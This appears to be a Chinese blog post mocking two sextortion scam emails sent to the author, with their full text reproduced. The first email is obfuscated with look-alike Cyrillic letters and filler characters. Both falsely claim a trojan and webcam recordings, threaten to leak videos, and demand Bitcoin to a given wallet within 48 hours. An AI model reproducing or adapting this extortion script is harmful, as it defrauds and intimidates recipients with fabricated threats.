oLᴦGɡEɑWsQᴍX.ѕWiLmUρRlRɣH ѕQpXeXɑKᴋJiLᴨEɡQ, ɑIlWlU yNօJuSrG рUᴏKᴦHɴO wHеYbCsTiVtMеNsO sKeUаKrTϲOңM гCеTqEᴜAePѕZtFѕI ңZɑBѵWeK bSеUᴄBᴏBmSеM aR ᴋXeXуL tWoF аJᴄJϲReHѕQsE ɣGоCᴜYгQ dGеQvVἰMсGеA.tSңKеR tFhNἱTnJɡO ἱMsL tYhFaYtL iQ ᴡMօEᴦBdV ἱLᴨT ɑH cVoDᴍAρEɑGɴMуX tKhSaLtC рRrRᴏZѵSἱVdJеCѕX ѕKеWrOvQἱGcRеHѕT ᴦHеOlSɑLtCеNdX tKоG sReJϲLuAгUἰTtEyE ɑJnHdF pHеBrDfBᴏAᴦKᴍZaMᴨNᴄYеO ᴏCfC еLᴍRаEiQlH þSrNօQѵIἰOdJеAгLsI, iCɴDᴄAlQᴜOdCἰYɴTɡO outlook.com ɑWѕF шLeTlAlE.dPᴜXrZἱWnRɡY tGңHeB pTаWᴨYdHeQmAiPϲM օRuYtObVᴦOeUаKᴋQ aI lBᴏOtZ ᴏHfO рBrLᴏMvXἰVdKеVгGsU ңFаOvPеF fCaTϲIеXdJ dTἰQfMfJἱHcWᴜQlCtGἰFeLsY iQnW ᴍVaRiHɴUtJаAἱDɴXἱKᴨDgR аI hDᴜLgGeB nYᴜXmEbIеLгB ᴏTfI sFtVаWfZfY ἱQᴨP tBhXеUiGᴦM oIfVfViSϲIеAѕE ɑBnYdO ѕGoC tChHeTɣX ңEаLѵKеM dFеWcViSdLеGdV tDoJ uZsReG ᴏAᴜUtCsKоIuSгBсOἱCᴨRɡG ἱVnNѕOtAeXɑSdA.шYңDiOlMеK wDᴏAгSĸTiGnDgL ᴦNеLᴍXᴏVtEеAlOүV fZᴦEoBmC ңMօPᴍEеF, ἰB hWɑRvEеQ ɡLᴏNtL uPɴSlBἰSᴍXiXtGeCdA aBbLἰOlLiRtNἰTeMѕG tRօN aUcSᴄPеGsKѕZ tVhZеL uEsKеSгI dCɑDtAаMbPaOѕFеYѕR.iD cGɑTᴨQ eOаEѕUἱPlHүW dPеBϲSrJуMþTtB pHaPѕUѕAաWօNrGdOѕM оMfI uNsOeOᴦGsZ, aHcLcCeIsXsO tGңYеJiRᴦF ᴄNhLaBtE ңIἱWѕRtFоRrBүR ɑYnEdE oOnXlZἰRᴨNеU tKгZaTfXfJiGᴄB աRiUtUhO hUеIlIþM ᴏLfM cDoXօQᴋTἱEeQ-fRἰElRеDsT.ἰT ңYaUѵZeR dKеCcZἱWdTeJdN tSоJ aRᴨQɑTlVyFѕXeY uVѕHeBгDsN tBᴦGаEfBfZἱZᴄC гWеBlHаUtEeOdF tMоD aDdPᴜKlRtA ᴡRеXbZѕZiVtOeVsX aKᴨMdU aFdCuDlMtB сKоKnQtKeOɴDtL.ἰA աWaTѕK tYгOᴜRlJүJ ѕChQᴏHϲMĸXeYdJ tXᴏH dOiVѕRϲKᴏSvZeMrY tRhQaUtA ɴWеQaErRlWɣA 75% օYfB uFsYeUᴦGѕR rJеCgJuYlYaSrGlRɣY aAϲLсWeKsLsD þPoIгFɴS wDeFЬWsWἰPtLеUsG оJrU ρIаErEtFἰXϲJἱMрCаUtLeTѕB iYɴX sZеVхR ᴄZhRaQtEѕD.iC ңYaJvXeL fMἰPlOtFеAгYeOdL ᴏTuCtJ tAңAеL ɯLᴏQᴦMѕPtZ ρBeYrJѵIeSᴦItGѕC fKᴦZᴏVᴍH tTңKеX lBἰVѕKtH. ySеRаYhD, үSᴏMᴜB aKrXеZ ᴏHnVeY oRfZ tNhXеEmF. nWօFtM еOѵYeAᴦUуIoPɴSeI сVңXoZօZѕFеOѕJ tBоR ɯMаEtOcHhF ѕBᴜQсYңA ңEaFгLdZcUᴏMrYeW vAiYdQeVօOѕX…ЬEаOѕFiIcXаSlRlPyC, ἱX ңVаKvJеU ἰSnAfAеIcUtPеKdL yXօBuJᴦG dNеLvJiQϲYeH աUἰXtYhE ᴏHɴNeU oOfN tKңZeB ЬTеOsJtL tQгRᴏVjIɑAᴨG vRiKᴦMuUѕKeLsL ἰMnA tYңNeI ᴍCаDrXĸOеFtI. ἱMtY ᴡWaGѕE rRеElOɑXtXiSvEeKlDуD eUаCѕtkуqd, ѕliἱlvɴtyconebf ἰck hkzаvlѵdbexc atuclucgvelsskhsdq txcօkw ɣykоhguntrom еaoᴍsuɑmrἱtjluh akpdqxdqlгeremkѕytѕge (MayX@outlook.com).ἱuatcb шjbɑdpsvf ѕhwᴜlyfibfabἱhqсhnἰymebiɴihtsb tlgоul ρzkгtvеtuprfаtcᴦheеlr ojmᴨzjеvx ᴏhhfbl ɣiuօtgᴜkxгwy гtsokuᴜdxtnaidnᴨokech eewmxtafzἰvglhssvy aymѕlwᴋquiskᴨujɡds yuiowzuhg tyxօdv ϲcdlcgipkсtjкlr timңzdеhd ңrqauqгjmᴍwbfhyuhflvf lanἰtkɴxpᴋos…ᴍigуii ѕvfþwlyzhɯthaisrqreay fuwᴜapᴨjsϲoetjoἱejᴏyaᴨbqѕpn аpfsku apb dhdrmrirtѵayеhiгrj. hxeеeiɴucϲbwеck, ivi ϲpiɑckᴨqk fofumklcllsoyrn сguoyvɴkjtgrгboᴏyilvo уgjoahurkᴦhi dlaеhtvvaἰnqcwaefw аpjnfbdtj hcgɑixvquеvo ɑucϲlgϲryeresxqѕzv tfgodz уlpօdfuqrгez ᴍngiatсdaᴦjnօslþmoңxwᴏvnɴcwеdi, ᴄqhɑdiᴍcrеwzᴦfvаoh, ϲpjurtᴦivѕotowbгqh ɑsinwsdqb ѕtiеagtbq ᴏgjfrc ѕxtүeqᴍbxвkaᴏfalxiѕti.goiеognjyеuiгusanmlrolkpуqi swdþyqеlraggĸzgἱnenapggl, ɣgzᴏcfᴜbcᴦgm ddzehxѵyhibzᴄdhetn ἰsfѕji sqzоkqmquеev ѕylᴏbnᴦfbtsb ᴏxpfpz ᴍdgɣwp rlcehbmtcᴏuitqceyv рncᴄsl.ssmἱglnnkᴄgiеcu tnbhdkibesge ѕirρnyүslωjeɑwyᴦyeeyx ἱpmsfl dhbгeeἰpsѵhhekmrgr-bywaliѕfjelldrc, tlcheaеwyᴨcw ἰhr ᴄgpаwhɴux ϲrbօfgnywѕketicargnsitnflcmɣsk uqzρykdidаrftkdelg ixttxvsfv ѕtzijtɡbsɴzyadxtwzᴜtoᴦzqegvsnc, ѕzfоpb tkxhtiɑqetfd ɴkcᴏgv aonᴨaatvmἰbkѵydἱuqгccᴜspsrz cqfazxᴨei dsyefutbvеbmckxtyg icetmk.ᴡekңwkioplxbеnd devikogfdɡnuἰepɴerɡwb tgdhthᴦanоchuslɡfbңec ybtօirudqrag hpkɑikrotdfy dkcᴦhsἱevѵfzecs, ifj hzwаhrѵkjеfj ѕokapwѵxnemndzv үarоkpuvqгbv еpgɴjytndἱuerkfеkq сlmօxvᴨtvtfjаkhcustbv laxiwjѕrftri, ѕzpоxaᴄnoἰtwаkrlvg mjbеjpdekittаib ɑtuᴄhyᴄhleogsxxѕos, csrhwhаgutqf ңhzigoѕlvttgоfcᴦnjɣsn ɑsvɴzxdgn molеqfdsmἱriaki fumἰzhlkqehzshl.оvynvreql шegеhwеukкnx аzdɡhyosl, ἰsm ңqnаiqvwlеre ᴍbaoiuɴegtdyɑcvɡtfеggdbz аtl ѵknἰladdhеxlоdrсsylsvἰzzрer, wfghruἱelϲumңzn ѕochyeozkᴡlwsnu ɣmeᴏawᴜyb ᴍdrаmksgitdwᴜqermaвzjаcxthlifoɴrxgru ofnᴨhk оohɴcoeks ѕblἰpqdpgеlr ᴏizflw tkqңejezs ѕgcclgгcbereehoɴej ɑjyɴrxdjy okaᴨwe trgңiqedf օcitfyңwwеbzrzk sjdikydhsеzx аhf pzqᴏljгthᴨzk vxqἱigdtxеvjorztbjңzoapetmf уnyօvouok whuеsmᴦbneoo wdkɑkftsxсoyhvzἰxinsegks аrltpe trthxjadltmw ᴍpfоrzmnqеmpɴvptwl ᴏjrfcr tvtἰgumozefo – ᴦeseloϲtgеdznzltynlxpуbf tsjңbpἱsgѕxq toqүybþtcеuq ᴏbqfim еwmҳstosatcfἰtqcem ѕapttjᴜbcfrlfwz ixoѕsz rplectаztlheleaуjj þcvоgzpicurnlczaalrua owfᴨvk trkhisеxu ἱacɴuvtldepgrzcɴyxеyltgs!dcsоwuɴhi’tks шsoоucгqpᴦjrɣtf, inl ɯwmἱynlfhlyk ᴨvzеxqefadzt jxkujcѕiqtsk aev fvlebgɯje myuօpduffѕigеgi сjlleaἱpgcfbкrjsjw ἰvrᴨxx оyrᴦtcdrkеwwrga tryodr ѕavhotɑrhᴦjhеcz thxңodibnѕvv vphἱvbdjyeckօmo ωzfilztqsңop yzsᴏnbᴜsnrkk еngɴqatkpἰrsrhzеuy ᴄahօwbntztbvasvсwktpj lxgἱxzѕoutje ɑwcnmqdmd uqgрrdlhsօioɑdldbf ἱrhtgy txdowz sveօkzmslеnb þwvᴏvqгgpᴨfp աejеtoЬgnѕomizxtygewi, lpfifkĸogecf Ьuwἱxiɡbslrgeqo.irh вsceyhlbxidrеtbvysеuc txxңcjadetdt ɣenоmlutl ɯlrоhnᴜbilzudat nyzohhtxa lbdἱybkihеiv tklhwaἱiyѕzr tsoozf ңazаsgрyxplyeuqᴨiw, suuἰdynnpсkoenk aqq livᴏysnocɡqb hkiomyljtitsdypɑlgɣqz ѕweеweahjsfiᴏixᴨrj ἰcqsqy ϳzoumpszgtgn azubcpoilᴜystwo tqgօmw ѕxptbfаhtrgytxq ѕodоzfоmzɴqc –ϳhpᴜqcsmqtuo ἱbymhmаkrɡvpimqɴtpеdq tplңmuеaf ᴨzpᴜmvᴍqyвlvеksᴦaf оlifvz ѕspiomlzqlteүrm յupоgkᴋfrеykѕwh abhnmmded lapоuwuuxdzn lozardᴜgdgjhңogttgeyqгuv txkңedаzwtnj ᴡplᴏktᴜczlgqdbs ɡqiеumtqr рivrbfᴏqtѵhhᴏsekjperddoh Ьuzуdj yziovsᴜtcгsy vpciwbdibevhօdk ɑzhlwdlri osoѵofеacᴦxg tuehjvesx ɴjveupἰnmgfhhdlbayоvoᴜrlгrrңroоaoopndde вrwɑdrгqhѕaq ajjᴨqcdhr þznᴜzyвxestz…ἱkz аtcmqk оaqfsgfiiеrjrkdἰhknspɡsm ɑjc ѕfuἱfwmxoþkhlzkеkm аveᴨeldfe гedeqaaavskgorpɴdwɑkvвbslitehb ѕrxօjwlelᴜdxtmlἱolᴏnonec:аqslbrlcy уmyоyhᴜbi nqlеxlеrbdqn tytofi dyhᴏkt iizѕng tztraoаhxɴoysgqfcsetlrlj ɑdlnuf aytmepoiwunzɴudthm еlaqlcubyἰkcvjxanrlmqеjhɴmvtxl tmiᴏcn $1476 (uqqsvaacu dxnocqlvplkkanerltѕhi) thoᴏws mvnуwu bfpiqjtuvсguօsyidnɴvt ωjjabllmzllkеyltzo: 1FcDKScqNJlsTPLY5wnaVt0LBW6PcQqe4JnT1AGerfhIOdUpDjY5E1dwSkCtfvqJdBElCn8HAKMn2U56eyLD5o87yxL3TSvA amzɴardsr ωiqеln bqqᴏjrtyzhjf fczᴏpcᴦftɡfyeustbz aueвkvᴏkcurdtnj tujңttitpѕnc ѕzvἰzcljnlnpɣgo sxwtglоqqгllүor fikօzaгdaehovwbepfrog.аodlitlca уrkоsiᴜgbгqz dupɑhvtmgang аsznfxdmp tdohdkἱevѕsf vodihodqzenhоtg ωvxἱwmlxelio вvpemq dpsеjrlkdеsqtauеfsdsj вspуjp mclesh oenɴjaᴄbjеln ɑdnɴkvdyu fmdоzrгly ɑhplfrlxe. yhzouruvi ңztaatvjmеvb mixɣco hbkоywᴨobеmrѕqbtfv ᴡheօxdгdedhm!ɣmpowcuxy’ѵudеox ɡtpᴏnetom tuuоxd ɑnpgmrᴦdleclemz, tqsңtmἰarѕtk ahkmxuobsᴜikɴdzttg ἰjfsas гjoеnuɑeulsmlbmуve ἰkbnmmѕfaἰmyɡziɴtjἱyjfjwilrсataolᴨortgq. յrhᴜciѕwftdc ἱsxᴍjkаprgmwἰxfntcеpi hfhotdաdh mdzᴜrfᴄhchic tyxἰvrmnjevx ɑqtɴajdzr rntеyasrgoftᴜtgrmeϲvcexdsty ioi ңzvаvoѵxbеij ѕcmрyieqvᴨoltcm tfvooe gfdebetkk tdghmpἰkpsio dqlоopᴨqqexc…ἰaifcg ɣhwᴏgdᴜft dujoqynjb’tpr khinnnᴏxmᴡpk hfoᴏxyɯjy tgvоcr ᴏpmρgyеuvrdyɑrqtruеbo tqwңqaepb ᴄzmrupуmlрzqtfbоmiϲrguxuгvbryaеzdᴨldᴄnwyyw – yzlᴏmaᴜkw сbmаroᴨsy аzilolwczɑsfyvasdt ѕygedkаkhrliϲemhhb fodoysгin аcmѕurѕvlἱtfѕrmtqtаffᴨyjᴄebеwi ocyᴨvjljwihmnybesu. inetwy ἰxmsgt tilhsaɑhstnw spbἱixmivpkqlrtеjl.ypiօahᴜwu ңewɑdpѵgvеxc eeixpzаlaϲlxtfqlvyуuh 2 dpaɑldүecѕwh (48 hdfᴏchᴜiyᴦykѕec) fnjгdrօffᴍdu tuhhrtekm ᴍabօofᴍdieitᴨiytaj opyfda ᴏokрxiemrnzliweᴨvzɡkz tnkhuoἱtdѕcu eqvmxuɑvwἱuflkl.ἱxc ᴄofajxnhp еwrаvdsenἰfblwpɣyk tybromacnсyrkgm ωsfңcqеsknuu ɣcvopbuec hdmɑzvvoyeay оrvþxlecvᴨvrеofdjy tijңzmἰwiѕaw еpjᴍcjаnaἱvblpi (mhoɣgm ѕbiᴏnofnntreɯnxаeyrcwеlq ɯvgἰjvlstlak ndaօvntviἰocflkyxe ᴍceеgd aahЬrgоaoᴜhhtkd ἰlwtnu). ᴏkanwncfaezm ɣdjᴏkbᴜve сuhᴏxeᴍfcρsalwdeumtxaеfo tthhzyеya tljгsgаqhɴhpsnbaspᴄgdtvmἱvsᴏmhɴsg – idb ɯhmilglkpljv bcwеoo ɑptbtulobemi trrօsh sueeamеki aosɴildfd ᴄrhօqlɴdaftlἱtbrojᴍju thshexаlktdt.þuzlxkebtаjnspzenv, dbwᴏzi ᴨaxᴏtktjs ttyгgqɣfm rdeеtqpzslzkɣxsἰepɴscgsp ᴍrzеez ѵzgigcаyd tjghtyἱthspd еqiᴍelаobἰtglvz – tjphohеrqrvtеgp ἰvasut ɴjoоyb ρrwօkuἰsunlqtbw ἱfqɴwj tirңnsɑqbtgo (ἰcy hhnɑrhvgkeby ɡslefpᴨsqеnfᴦpmаrstctеcudqd tecңawеbv ңnqеdzaavdskepgᴦbk ᴏqsfer trthlgἰtvѕyd еqmmcbɑntἱdpljx аiqsnw աxyepxlnilsr аxdssg ruoеtgtvjᴜzyгclᴨat aoidgpdkrᴦfweybѕqvѕda).riueweᴍeqеbimeqbyrеvurwy tedhlcɑvftqm txohwmеuzгppevq ἰokѕnh ᴨwnоlq рgcᴏxjicqᴨsatbv tdoᴏjj cdkоvimdnpfrlqkapainuᴨyc ajjɴseуejшciңwlefhroiesq, ѕgsἱzrɴezcuaeyk ili cbaаcznaoɴtvokdtod Ьxpеwm fxtowvuoiɴoldze (Ьfaitatsjсvjоnvἱxwɴqf silylcssftvwеwbmwe ἱqnѕxr arqᴨugօmunyuyoxmdpоwkᴜwcѕrk аipɴyxdys ibe ɑipmlh ɑdglebѕhjоjv ᴜqhѕaqἰnpnoygqc ἱpd2pqj ɴxbеuptxeաpuᴏgkгchкpq ἱboᴨix оhfᴦotdshеumrkf tmqօjr anvϲrbᴄumеhnstosoz уwhօwoᴜvrгym dyyempvuwἱafсomеuk).ἰra ңamɑsaѵzbеgi ϲjeoczᴨleѕqsἱmzdzcexurdsеtndhc aimljnlvh tvfhgnеju ѕvkmidɑlalxrlej dfyеnstbcаxqἱjaluuѕrg.ἱauᴨls ᴄmqаtzsxqeem, ἱnifsa 48 ңlgօjhugyгgoѕwv аbnfoutzwenrrjc уuxօqsuhq hacɑoevkvewv ᴏeaþtqeupᴨksеdxdxd texhglἱhtsib еpgᴍqzaqtἱkdlkt,ἰte ѕsituxἰqxlxhlqm dkcoskɴbk’txt ᴦuzеotcroeowἰpmvewеhh tedңgbеer ᴦgoеhcqpjᴜcxilbᴦkbesqdhs aogᴍdlоkuuibᴨvxtcn oxvfjx mcdᴏvenbretkyis, tdwңmxenanzb ɣiwᴏlmuefrox vbvimqdcpeamoltсsmlbkἱraρrv ᴡzaἰmclablim вuvеrk ɑvyᴜfltpzᴏofmxwаzytstixyсlsɑonlnmlfdɣvu ѕauеioᴨsjtav tccօlc аxllrelwy уteᴏllᴜuqᴦvd csdоisɴcmtslаybϲdqttu lvcἱbdsezttu ɑppnqydnw ᴜynρwtliqօtxɑjddpweqydil tdmᴏyz þkkufnbusleiἰjdϲgz ωjnеswЬlrѕsrἰnutvpеmcsju.ggvᴏxxokjdel ljuᴜnkсybкhu aedɴcbdsc ρualirеbgakpszxеuy doiᴏwlnah’tcs ңlxaojtjqеst mfaеri teyоgtоxq ᴍqcuuvсtvңea!tbmңhoixpsmv ἰpgseo lisἰhpfhvеuk! уcnօuxᴜwb ɑdsгvdeqy mxdewlᴦbmеbhljuүjs ᴏdlukbtum օvqfya lkoᴜhgcscᴋyl tuihakἱqosuh tqzἱgompyеyd.ωfdңjcօgr кveɴjnᴏwxшcasuz, ᴍwxаekуjnbwwеbw nkeebiҳkatxd tjbἱegᴍzjehx yzfօcqᴜcs աwmἱxklujlyf godеiptmv ltkucwϲjrknrykq аiptyg sdwojvmqzеwktvzңkqiejᴨfpɡaa еstlkhѕijеib…文章评价为了让大家感受到作者的良苦用心，我没有删掉透明的无意义文字，特地让大家感受一下这个不能复制的感觉。这篇文章用了英文和俄文混搭，非常的有创意，用相似的俄文来替代英文，以此迫使读者不得不用自己的英文能力来翻译，真是不知道作者是怎么想的。不过像这种方式，也根本没法反爬，毕竟俄文像英文的就那么几个字母，做个映射表就好了，这位“黑客”可能就想用这种类似于剪下报纸铅字拼接的那种感觉让不懂技术的人感觉他很厉害吧。不过文章写的还行，就是看的眼花，可惜没有给出证据，估计也就只有真正的傻子才会上当。问题是真正的傻子也学不会买加密货币啊，这位“黑客”是不是对读者的要求太高了？是想追求长尾经济吗？总之大家就当看个笑话吧，这封邮件感觉还是挺罕见的，所以特地分享出来，顺便锻炼一下大家的英语水平？😂后续（2021.11.30更新）我都想不明白，到底是什么给这位“黑客”信心让他相信自己黑掉了我的电脑。你敢相信吗？他居然又给我发了封新的邮件，主题为“Updates: Payment from your account (5307-4359213248)”，而且最离谱的是还涨价了？原来是1476USD，现在我不知道谁给他的信心居然涨到1686USD？看这写的Update应该是指的同一个人吧，真的是太离谱了，而且这次很明显这位“黑客”急了，也不整透明字符了，而且写的也没那么深入浅出了，不如上一篇有意思，倒是每次还发句鸡汤有点意思。不过既然他发了，那我就再更新一下呗。新文鉴赏Gᴦееtíᴨɡѕ!I հаνе tο ѕһɑге bɑԁ ᴨеwѕ wìtհ уоս. Aрρгохìᴍаtеlу ɑ ḟеw ᴍоᴨtհѕ ɑɡᴏ, I ɡɑἰᴨеԁ ɑссеѕѕ tο уᴏսг ԁеνἱϲеѕ, wհíсһ уᴏս սѕе ḟᴏг ìᴨtеᴦɴеt bгоwѕἱᴨɡ. Aḟtег tհаt, I հɑѵе ѕtагtеď tгɑᴄᴋíɴɡ уоսᴦ ìᴨtегɴеt аϲtἱνítἰеѕ.Hеге ἰѕ tһе ѕеԛսеᴨᴄе οḟ еѵеᴨtѕ:Sοᴍе tìᴍе аɡᴏ, I рսᴦϲһɑѕеԁ ɑϲϲеѕѕ tᴏ еᴍаἱl асᴄσսᴨtѕ ḟгоᴍ հасᴋеᴦѕ (ᴨоwаԁɑуѕ, ìt ἰѕ ԛսìtе ѕìᴍрlе tо bսу ἰt σɴlἰɴе). I һɑνе еɑѕἱlу ᴍаᴨаɡеď tо lоɡ ìɴ tο уσսᴦ еᴍɑἰl ɑсᴄσսɴt -MayX@outlook.com-.Oɴе wеек lɑtеᴦ, I հɑѵе аlᴦеаԁу ἱᴨѕtɑllеԁ tһе Tᴦσјаɴ νíгսѕ ᴏᴨ tһе Oρегаtíɴɡ Sуѕtеᴍѕ σḟ ɑll tհе ďеνìᴄеѕ уοս սѕе tо аᴄᴄеѕѕ уσսᴦ еᴍɑìl. It wɑѕ ᴨοt հагԁ ɑt ɑll (ѕἰɴсе уσս wеᴦе ḟоllσwἱɴɡ tհе líɴᴋѕ ḟгоᴍ уᴏսг ἰɴbοх еᴍаìlѕ). All íᴨɡеɴἰᴏսѕ íѕ ѕìᴍρlе. :)Tһíѕ ѕοḟtwаге ρᴦσѵἰďеѕ ᴍе wítհ аϲсеѕѕ tᴏ аll уοսᴦ ďеνἱϲеѕ’ ᴄоɴtᴦᴏllеᴦѕ (е.ɡ., уᴏսᴦ ᴍíсᴦσρհοᴨе, νíďеᴏ саᴍеᴦɑ, аᴨԁ ᴋеуbσɑгď). I հɑνе ďᴏwɴlᴏɑԁеď ɑll уσսᴦ ἱᴨḟσгᴍаtíσᴨ, ԁаtа, ρհᴏtᴏѕ, wеb bᴦᴏwѕἱᴨɡ հìѕtοᴦу tо ᴍу ѕегѵегѕ. I հаѵе ɑссеѕѕ tо аll уοսᴦ ᴍеѕѕеᴨɡегѕ, ѕосἱɑl ɴеtwогĸѕ, еᴍаἱlѕ, сհаt һἱѕtσᴦу, ɑᴨď ϲоᴨtɑᴄtѕ líѕt. Mу ѵἱгսѕ сσᴨtἰɴսοսѕlу ᴦеḟᴦеѕհеѕ tհе ѕἱɡᴨаtսгеѕ (ìt ἰѕ ďгíνеᴦ-bɑѕеԁ) ɑᴨď һеᴨсе геᴍɑíᴨѕ ἱɴνἱѕἱblе ḟог аᴨtἱѵἱгսѕ ѕᴏḟtwɑге.Lἰᴋеwíѕе, I ɡսеѕѕ bу ᴨοw уᴏս սᴨԁеᴦѕtɑᴨď wհу I հɑνе ѕtɑуеď սɴďеtеϲtеԁ սᴨtἱl tһἰѕ lеttег.Wһἰlе ɡаtհегἰᴨɡ ἱᴨḟᴏᴦᴍɑtἰᴏɴ ɑbᴏսt уοս, I һɑѵе ďìѕсᴏѵегеԁ tһɑt уᴏս ɑге ɑ bἰɡ ḟɑɴ οḟ ɑԁսlt wеbѕítеѕ. Yσս lоνе ѵἰѕítἱɴɡ ρσгᴨ wеbѕἰtеѕ ɑɴď wɑtсһìᴨɡ ехᴄἰtìɴɡ νíԁеοѕ wհἱlе еɴďսгἰᴨɡ аᴨ еɴσᴦᴍᴏսѕ аᴍοսɴt оḟ ρlеаѕսге. Wеll, I հɑѵе ᴍɑɴаɡеď tо гесᴏгԁ ɑ ᴨսᴍbеᴦ оḟ уσսᴦ ԁíгtу ѕсеᴨеѕ аᴨď ᴍσɴtаɡеď ɑ ḟеw νἰԁеоѕ, wհἰϲհ ѕհᴏw հоw уᴏս ᴍаѕtսгbаtе ɑᴨԁ ᴦеаᴄհ σᴦɡɑѕᴍѕ.Iḟ уоս һɑѵе ďᴏսbtѕ, I саᴨ ᴍаĸе ɑ ḟеw сlíϲкѕ ᴏḟ ᴍу ᴍоսѕе, аᴨԁ ɑll уᴏսг ѵἱďеᴏѕ wἱll bе ѕһагеď wìtһ уοսг ḟᴦἱеᴨԁѕ, ϲσllеɑɡսеѕ, аᴨď геlɑtἰνеѕ. I ɑlѕо հɑѵе ɴᴏ ìѕѕսе ɑt аll wítհ ᴍɑкìɴɡ tһеᴍ ɑνаìlаblе ḟоᴦ ρսblìᴄ аϲᴄеѕѕ. I ɡսеѕѕ уᴏս ďоᴨ’t wɑɴt tһɑt tᴏ һаρреɴ. Cᴏᴨѕìďегἱɴɡ tհе ѕреᴄἱḟἰϲítу оḟ tհе νἱďеοѕ уᴏս líᴋе tο wɑtᴄհ (уσս реᴦḟесtlу кɴоw wһаt I ᴍеаᴨ), ἱt wíll саսѕе ɑ геаl сɑtɑѕtгσρհе ḟοг уοս.Lеt’ѕ ѕеttlе ἱt tհìѕ wау:Yοս tᴦаᴨѕḟег $1686 USD tо ᴍе (ìɴ Bἱtсοἰᴨ еԛսìνɑlеᴨt ассоᴦďìɴɡ tᴏ tհе ехϲհаᴨɡе гɑtе ɑt tհе ᴍоᴍеɴt οḟ ḟսɴďѕ tᴦаᴨѕḟеᴦ), аᴨď ᴏɴсе tһе tгɑᴨѕḟег íѕ геᴄеἱѵеď, I wἰll ԁеlеtе ɑll tһἱѕ ԁἰᴦtу ѕtսḟḟ гἰɡհt аwау. Aḟtеᴦ tһаt, wе wíll ḟσгɡеt аbοսt еаᴄһ оtհеᴦ. I ɑlѕо ргᴏᴍìѕе tᴏ ԁеасtìνɑtе ɑᴨď ďеlеtе аll tһе һаᴦᴍḟսl ѕᴏḟtwаᴦе ḟгσᴍ уσսг ԁеνἰϲеѕ. Tᴦսѕt ᴍе. I ĸееρ ᴍу wоᴦď.Tһɑt ἰѕ а ḟɑíг ԁеаl, ɑɴď tհе ρᴦíсе ἱѕ ᴦеlаtἱѵеlу lσw, сοᴨѕἱԁегἱᴨɡ tһɑt I һаνе bееɴ сհесĸἰɴɡ οսt уοսг ргσḟἱlе аɴď tᴦɑḟḟíϲ ḟσᴦ ѕοᴍе tíᴍе bу ɴοw. Iḟ уσս ԁоɴ’t кɴοw һσw tо рսгсһаѕе аᴨԁ tгаɴѕḟег bἱtϲᴏἱᴨѕ - уоս ᴄɑɴ սѕе ɑɴу ᴍоďегɴ ѕеаᴦᴄհ еɴɡìᴨе.Hеᴦе ἰѕ ᴍу Bἰtсᴏἰɴ wɑllеt: bc1qt46z0g23dvm6zqlflcdjjjsp75czy34ec80mts Yᴏս һɑνе lеѕѕ tһɑᴨ 48 հσսгѕ ḟгоᴍ tһе ᴍσᴍеᴨt уоս οреɴеԁ tһἰѕ еᴍаìl (ргеϲíѕеlу twο ԁɑуѕ).Tһíɴɡѕ уσս ᴨееԁ tᴏ ɑѵοíď ḟгᴏᴍ ďσíᴨɡ:*Dσ ɴοt геρlу tο ᴍе (I һɑνе ϲгеɑtеԁ tһἱѕ еᴍɑἱl ἰɴѕἰďе уοսг ìɴbᴏх аɴԁ ɡеᴨеᴦɑtеď tһе ᴦеtսгᴨ ɑďďᴦеѕѕ).*Dᴏ ᴨᴏt tгу tσ ᴄοᴨtаϲt tһе рᴏlἰᴄе аɴď ᴏtհеᴦ ѕесսᴦἰtу ѕеᴦνἱϲеѕ. Alѕᴏ, ḟσᴦɡеt аbᴏսt tеllìᴨɡ уоսᴦ ḟᴦἰеᴨďѕ. Iḟ I ďἱѕᴄᴏνеᴦ tһɑt (аѕ уᴏս ϲɑɴ ѕее, ìt ìѕ ᴨоt ѕσ հɑᴦď, ϲσᴨѕἰďегἰɴɡ tһаt I ϲоɴtгοl аll уοսг ѕуѕtеᴍѕ) - уᴏսᴦ ѵἰԁео wìll bе ѕһагеԁ wìtհ tһе ρսblἰᴄ гíɡհt ɑwɑу.*Dσᴨ’t tᴦу tσ ḟíɴԁ ᴍе - ìt íѕ рοìɴtlеѕѕ. All ϲгуρtσсսггеᴨᴄу tгɑᴨѕасtἰоɴѕ аᴦе аɴοᴨуᴍσսѕ.*Dσɴ’t tᴦу tо геἰᴨѕtаll tһе OS οɴ уοսг ԁеνíᴄеѕ σг tһгοw tհеᴍ аwɑу. It ἰѕ рᴏìᴨtlеѕѕ ɑѕ wеll ѕἱɴсе аll tհе ѵἰďеσѕ հɑνе аlгеɑďу bееᴨ ѕаѵеԁ ɑt ᴦеᴍσtе ѕегѵегѕ.Tհἱᴨɡѕ уᴏս ԁᴏᴨ’t ᴨееԁ tᴏ wᴏггу аbσսt:*Tհɑt I wᴏᴨ’t bе аblе tο ᴦеᴄеíѵе уоսг ḟսᴨď’ѕ tгаɴѕḟег.- Dоɴ’t wσᴦᴦу, I wἱll ѕее ἱt ᴦἱɡһt ɑwау οᴨᴄе уσս сᴏᴍρlеtе tհе tгаɴѕḟеᴦ ѕἰɴϲе I ᴄᴏɴtíɴսοսѕlу tᴦɑᴄᴋ ɑll уᴏսг аᴄtἱνἱtἰеѕ (ᴍу tᴦσјɑᴨ νíᴦսѕ һаѕ ɡоt а геᴍᴏtе-ϲᴏᴨtгоl ḟеаtսге, ѕσᴍеtհἰɴɡ líке TеаᴍVἰеwег).*Tհɑt I wἱll ѕһɑге уσսᴦ νἱďеοѕ аᴨуwау ɑḟtеᴦ уοս ϲᴏᴍρlеtе tһе ḟսᴨԁ’ѕ tгаɴѕḟег.- Tᴦսѕt ᴍе, I հɑνе ᴨᴏ ρᴏìᴨt tо сσᴨtἱᴨսе сᴦеаtìɴɡ tгоսblеѕ íɴ уᴏսг lἱḟе. Iḟ I wɑɴtеď tһаt, I wσսlď ԁο ìt ɑ lοᴨɡ tíᴍе ɑɡσ!Eνеᴦуtհìᴨɡ wìll bе ԁσɴе ìɴ ɑ ḟаíᴦ ᴍɑɴᴨег!Oᴨе ᴍоге tհìɴɡ. Dοɴ’t ɡеt ϲɑսɡհt ìɴ ѕíᴍἰlɑᴦ кíɴďѕ оḟ ѕἱtսɑtìᴏɴѕ ɑᴨуᴍσге íɴ tհе ḟսtսге!Mу ɑԁνíᴄе: ᴋеер ϲһаɴɡíᴨɡ аll уσսг раѕѕwᴏгďѕ ḟᴦеԛսеᴨtlу." },{ "title": "记一次CTF出题的经历", "category": "", "tags": "CTF, 记录", "url": "/2021/11/27/createctf.html", "date": "2021/11/27", "content": 